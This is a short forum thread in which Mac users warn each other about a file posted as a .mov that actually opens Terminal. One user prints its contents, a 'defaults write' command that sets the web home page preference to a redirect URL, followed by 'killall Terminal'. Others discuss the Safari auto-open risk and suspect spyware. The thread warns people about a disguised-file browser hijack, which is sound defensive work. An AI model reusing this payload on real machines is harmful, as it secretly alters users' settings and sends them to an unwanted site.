Uh, Who are you? Where did you get the file? It is a .mov but really opens the terminal and writes a new config file to the users/library/preferences.
It opens just fine on OSX. What are you up to? I viewed the mov in textedit. Good thing I did.
Here is the inside of your .mov file
defaults write ~/Library/Preferences/com.apple.internetconfigpriv WWWHomePage "http://www.vistabyte.com/redirect.php"
killall Terminal;

I was just about to say the same thing - very suspicious. If anyone else views this, do not click on the link as it downloads to your desktop immediately, and if you have not disabled safari (if you use Safari) to not open files, it will run.

You are very correct. I had mine disabled or it would have ran.

It creates a .plist called:
com.apple.internetconfigpriv.plist
...which has an entry for a website and a downloads destination...
First post, possible spyware?

Think I am going to change the name of Terminal to prevent this sort of thing !
EDIT: Now the poster has changed the location of the original file he posted???? This doesn't seem right!

You changed the URL so now people who did not see it will not know what you did. Trust me, I know. So does the other poster here.
